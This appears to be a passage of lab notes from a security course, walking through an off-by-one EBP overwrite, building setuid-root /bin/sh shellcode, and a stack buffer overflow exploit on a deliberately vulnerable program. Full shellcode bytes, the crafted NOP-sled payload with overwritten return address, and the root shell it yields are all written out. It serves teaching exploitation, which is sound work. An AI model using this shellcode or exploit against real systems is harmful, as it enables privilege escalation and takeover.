		   0x08049198 <+56>:    mov    -0x104(%ebp),%eax
		   0x0804919e <+62>:    mov    %dl,-0x100(%ebp,%eax,1)
		   0x080491a5 <+69>:    mov    -0x104(%ebp),%eax
		   0x080491ab <+75>:    add    $0x1,%eax
		   0x080491ae <+78>:    mov    %eax,-0x104(%ebp)
		   0x080491b4 <+84>:    jmp    0x804917c <func+28>
		   0x080491b9 <+89>:    add    $0x108,%esp
		   0x080491bf <+95>:    pop    %ebp
		   0x080491c0 <+96>:    ret
		End of assembler dump.

	We put breakpoints before and after the loop to see the change of the buffer. Then we run with a recognisable input.

		(gdb) b *0x08049176
		Breakpoint 1 at 0x8049176: file exploitme.c, line 5.
		(gdb) b *0x080491b9
		Breakpoint 2 at 0x80491b9: file exploitme.c, line 8.
		(gdb) run `python -c 'print 256*"A"'`
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.6/exploitme `python -c 'print 256*"A"'`

		Breakpoint 1, 0x08049176 in func (str=0xbffff413 'A' <repeats 200 times>...)
		    at exploitme.c:5
		5         for (int i=0;i<=256;i++) {
		(gdb) x/68xw buf
		0xbffff098:     0x00000003      0x00000000      0xb7fff000      0xb7df26a0
		0xbffff0a8:     0xb7de88a0      0x0804828a      0xbffff0e4      0xf63d4e2e
		0xbffff0b8:     0xbffff0e0      0x07b1ea71      0xbffff174      0xb7fd03e0
		0xbffff0c8:     0x00000000      0x00000000      0x00000000      0x00000000
		0xbffff0d8:     0x00000000      0x00000000      0x00000000      0x00000000
		0xbffff0e8:     0x00002fff      0xb7fb8000      0x00000000      0xf63d4e2e
		0xbffff0f8:     0xb7fffb0c      0xbffff174      0x0804828a      0xb7fe0936
		0xbffff108:     0x08048250      0xbffff17c      0xb7fffab0      0x00000001
		0xbffff118:     0xb7fd0410      0x00000001      0x00000000      0x00000001
		0xbffff128:     0xb7fff950      0x00000001      0x00000000      0x00c30000
		0xbffff138:     0x00000001      0xb7ffe840      0xbffff190      0x00000000
		0xbffff148:     0xb7fff000      0x00000000      0x00000000      0xbffff254
		0xbffff158:     0xb7fb8000      0xb7fb69e0      0x00000000      0xb7fb8000
		0xbffff168:     0xb7ffe840      0xb7fbbd08      0xb7fe62d0      0xb7fb8000
		0xbffff178:     0x00000000      0xb7e169eb      0xb7fb83fc      0x00040000
		0xbffff188:     0x00000000      0x0804924b      0x00000002      0xbffff254
		0xbffff198:     0xbffff1b8      0x080491f0      0xbffff413      0x00000000
		(gdb) c
		Continuing.

		Breakpoint 2, func (str=0xbffff413 'A' <repeats 200 times>...) at exploitme.c:8
		8       }
		(gdb) x/68xw buf
		0xbffff098:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff0a8:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff0b8:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff0c8:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff0d8:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff0e8:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff0f8:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff108:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff118:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff128:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff138:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff148:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff158:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff168:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff178:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff188:     0x41414141      0x41414141      0x41414141      0x41414141
		0xbffff198:     0xbffff100      0x080491f0      0xbffff413      0x00000000

	We see that due to the off-by-one error we've overwritten the last byte of the saved EBP with the null terminator of our string.


Notes for 4.8

	Let's start by building the machine instructions to spawn a shell.

		admin@kali:~/SecurityClass/Tutorial-04/4.7$ as testshell.s -o testshell.oa
		dmin@kali:~/SecurityClass/Tutorial-04/4.7$ ld testshell.o -o testshell
		admin@kali:~/SecurityClass/Tutorial-04/4.7$ objdump -d testshell
		testshell:     file format elf32-i386


		Disassembly of section .text:

		08049000 <_start>:
		 8049000:       31 c0                   xor    %eax,%eax
		 8049002:       b0 46                   mov    $0x46,%al
		 8049004:       31 db                   xor    %ebx,%ebx
		 8049006:       31 c9                   xor    %ecx,%ecx
		 8049008:       cd 80                   int    $0x80
		 804900a:       eb 16                   jmp    8049022 <ender>

		0804900c <starter>:
		 804900c:       5b                      pop    %ebx
		 804900d:       31 c0                   xor    %eax,%eax
		 804900f:       88 43 07                mov    %al,0x7(%ebx)
		 8049012:       89 5b 08                mov    %ebx,0x8(%ebx)
		 8049015:       89 43 0c                mov    %eax,0xc(%ebx)
		 8049018:       b0 0b                   mov    $0xb,%al
		 804901a:       8d 4b 08                lea    0x8(%ebx),%ecx
		 804901d:       8d 53 0c                lea    0xc(%ebx),%edx
		 8049020:       cd 80                   int    $0x80

		08049022 <ender>:
		 8049022:       e8 e5 ff ff ff          call   804900c <starter>
		 8049027:       2f                      das
		 8049028:       62 69 6e                bound  %ebp,0x6e(%ecx)
		 804902b:       2f                      das
		 804902c:       73 68                   jae    8049096 <ender+0x74>
		 804902e:       4e                      dec    %esi
		 804902f:       41                      inc    %ecx
		 8049030:       41                      inc    %ecx
		 8049031:       41                      inc    %ecx
		 8049032:       41                      inc    %ecx
		 8049033:       42                      inc    %edx
		 8049034:       42                      inc    %edx
		 8049035:       42                      inc    %edx
		 8049036:       42                      inc    %edx
		        ...

	Inside example.c we can find these instructions as a string.

		admin@kali:~/SecurityClass/Tutorial-04/4.7$ cat example.c
		/*test.c*/

		#include <unistd.h>

		char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";

		int main(int argc, char **argv) {
		  /*creating a function pointer*/
		  int (*func)();
		  func = (int (*)()) code;
		  (int)(*func)();
		}

	We can compile this program and run it. We need to disable stack protectors and to allow execution on the stack.

		admin@kali:~/SecurityClass/Tutorial-04/4.7$ gcc -g -fno-stack-protector -z execstack -o example example.c
		admin@kali:~/SecurityClass/Tutorial-04/4.7$ ./example
		$ woami
		admin

	We end up on the spawned shell, but without root privileges.
	We will now change the permissions of the program to enable the SETUID flag.

		admin@kali:~/SecurityClass/Tutorial-04/4.7$ sudo chown root:root example
		admin@kali:~/SecurityClass/Tutorial-04/4.7$ sudo chmod 4755 example
		admin@kali:~/SecurityClass/Tutorial-04/4.7$ ls -la
		total 52
		drwxr-x--- 2 admin admin  4096 Apr  1 14:19 .
		drwxr-x--- 9 admin admin  4096 Feb  3 07:33 ..
		-rwsr-xr-x 1 root  root  16944 Apr  1 14:19 example
		-rwxr-x--- 1 admin admin   404 Feb  3 07:32 example.c
		-rwxr-xr-x 1 admin admin  4580 Apr  1 14:11 testshell
		-rw-r--r-- 1 admin admin   568 Apr  1 14:11 testshell.o
		-rwxr-x--- 1 admin admin  1007 Feb  3 07:32 testshell.s
		-rwxr-x--- 1 admin admin   230 Feb  3 07:32 vulnerable.c

	We see that we have the s flag for example. Now if we run the program, we see that we end up on a root shell.

		admin@kali:~/SecurityClass/Tutorial-04/4.7$ ./example
		# whoami
		root


Notes for 4.9

	We start by compiling the program without stack protectors and with stack execution.
	Then we open the program in gdb and we disassemble it.

		admin@kali:~/SecurityClass/Tutorial-04/4.8$ gcc -g -fno-stack-protector -z execstack -o vulnerable vulnerable.c
		admin@kali:~/SecurityClass/Tutorial-04/4.8$ gdb -q vulnerable
		Reading symbols from vulnerable...
		(gdb) run test
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.8/vulnerable test
		[Inferior 1 (process 2460) exited normally]
		(gdb) disass main
		Dump of assembler code for function main:
		   0x004011d4 <+0>:     lea    0x4(%esp),%ecx
		   0x004011d8 <+4>:     and    $0xfffffff0,%esp
		   0x004011db <+7>:     pushl  -0x4(%ecx)
		   0x004011de <+10>:    push   %ebp
		   0x004011df <+11>:    mov    %esp,%ebp
		   0x004011e1 <+13>:    push   %ebx
		   0x004011e2 <+14>:    push   %ecx
		   0x004011e3 <+15>:    call   0x4011a5 <__x86.get_pc_thunk.dx>
		   0x004011e8 <+20>:    add    $0x2e18,%edx
		   0x004011ee <+26>:    mov    %ecx,%eax
		   0x004011f0 <+28>:    cmpl   $0x2,(%eax)
		   0x004011f3 <+31>:    je     0x401210 <main+60>
		   0x004011f5 <+33>:    sub    $0xc,%esp
		   0x004011f8 <+36>:    lea    -0x1ff8(%edx),%eax
		   0x004011fe <+42>:    push   %eax
		   0x004011ff <+43>:    mov    %edx,%ebx
		   0x00401201 <+45>:    call   0x401040 <puts@plt>
		   0x00401206 <+50>:    add    $0x10,%esp
		   0x00401209 <+53>:    mov    $0x1,%eax
		   0x0040120e <+58>:    jmp    0x401229 <main+85>
		   0x00401210 <+60>:    mov    0x4(%eax),%eax
		   0x00401213 <+63>:    add    $0x4,%eax
		   0x00401216 <+66>:    mov    (%eax),%eax
		   0x00401218 <+68>:    sub    $0xc,%esp
		   0x0040121b <+71>:    push   %eax
		   0x0040121c <+72>:    call   0x4011a9 <func>
		   0x00401221 <+77>:    add    $0x10,%esp
		   0x00401224 <+80>:    mov    $0x0,%eax
		   0x00401229 <+85>:    lea    -0x8(%ebp),%esp
		   0x0040122c <+88>:    pop    %ecx
		   0x0040122d <+89>:    pop    %ebx
		   0x0040122e <+90>:    pop    %ebp
		   0x0040122f <+91>:    lea    -0x4(%ecx),%esp
		   0x00401232 <+94>:    ret
		End of assembler dump.
		(gdb) disass func
		Dump of assembler code for function func:
		   0x004011a9 <+0>:     push   %ebp
		   0x004011aa <+1>:     mov    %esp,%ebp
		   0x004011ac <+3>:     push   %ebx
		   0x004011ad <+4>:     sub    $0x44,%esp
		   0x004011b0 <+7>:     call   0x401233 <__x86.get_pc_thunk.ax>
		   0x004011b5 <+12>:    add    $0x2e4b,%eax
		   0x004011ba <+17>:    sub    $0x8,%esp
		   0x004011bd <+20>:    pushl  0x8(%ebp)
		   0x004011c0 <+23>:    lea    -0x48(%ebp),%edx
		   0x004011c3 <+26>:    push   %edx
		   0x004011c4 <+27>:    mov    %eax,%ebx
		   0x004011c6 <+29>:    call   0x401030 <strcpy@plt>
		   0x004011cb <+34>:    add    $0x10,%esp
		   0x004011ce <+37>:    nop
		   0x004011cf <+38>:    mov    -0x4(%ebp),%ebx
		   0x004011d2 <+41>:    leave
		   0x004011d3 <+42>:    ret
		End of assembler dump.

	We find that the next eip at the call of func is 0x00401221. This is the value we will need to overwrite.
	We put a breakpoint after the call to strcpy, we run the program with a recognisable input and we look at our buffer.

		(gdb) b *0x4011cb
		Breakpoint 1 at 0x4011cb: file vulnerable.c, line 6.
		(gdb) run `python -c 'print 64*"\x90"'`
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.8/vulnerable `python -c 'print 64*"\x90"'`

		Breakpoint 1, 0x004011cb in func (str=0xbffff4d2 '\220' <repeats 64 times>)
		    at vulnerable.c:6
		6         strcpy(buf,str);
		(gdb) x/20xw buf
		0xbffff200:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff210:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff220:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff230:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff240:     0xb7fb8300      0x00000000      0xbffff268      0x00401221

	We find that we have 76 bytes before the eip to overwrite. We also find that the buffer start at 0xbffff200.
	We get the shellcode back from last exercise. It is 55 bytes long. We can then start with 76-55=21 nops to fill the buffer.
	We can then craft what we're going to input in the program using python.

		python -c 'print 21*"\x90" + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + "\x10\xf2\xff\xbf"'

	Here we take 0xbffff210 for our replacement of EIP instead of the start of the buffer 0xbffff200 since 0x00 is a null terminator and it would break our string. This address is in the middle of our NOP sled so we can start executing from there.
	We can now give this input to the program and look at the result in the buffer.

		(gdb) run `python -c 'print 21*"\x90" + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + "\x10\xf2\xff\xbf"'`
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.8/vulnerable `python -c 'print 21*"\x90" + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + "\x10\xf2\xff\xbf"'`

		Breakpoint 1, 0x004011cb in func (str=0xbffff400 "\a") at vulnerable.c:6
		6         strcpy(buf,str);
		(gdb) x/20xw buf
		0xbffff1f0:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff200:     0x90909090      0xb0c03190      0x31db3146      0xeb80cdc9
		0xbffff210:     0xc0315b16      0x89074388      0x4389085b      0x8d0bb00c
		0xbffff220:     0x538d084b      0xe880cd0c      0xffffffe5      0x6e69622f
		0xbffff230:     0x4e68732f      0x41414141      0x42424242      0xbffff210

	We see that the address of the buffer differ slightly. We modify the address for another one in the nop sled and run again.

		(gdb) run `python -c 'print 21*"\x90" + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + "\xf8\xf1\xff\xbf"'`
		The program being debugged has been started already.
		Start it from the beginning? (y or n) y
		Starting program: /home/admin/SecurityClass/Tutorial-04/4.8/vulnerable `python -c 'print 21*"\x90" + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42" + "\xf8\xf1\xff\xbf"'`

		Breakpoint 1, 0x004011cb in func (str=0xbffff400 "\a") at vulnerable.c:6
		6         strcpy(buf,str);
		(gdb) x/20xw buf
		0xbffff1f0:     0x90909090      0x90909090      0x90909090      0x90909090
		0xbffff200:     0x90909090      0xb0c03190      0x31db3146      0xeb80cdc9
		0xbffff210:     0xc0315b16      0x89074388      0x4389085b      0x8d0bb00c
		0xbffff220:     0x538d084b      0xe880cd0c      0xffffffe5      0x6e69622f
		0xbffff230:     0x4e68732f      0x41414141      0x42424242      0xbffff1f8

	We can now let the program continue, and we end up in the spawned shell.

		(gdb) c
		Continuing.
		process 2588 is executing new program: /usr/bin/dash
		$
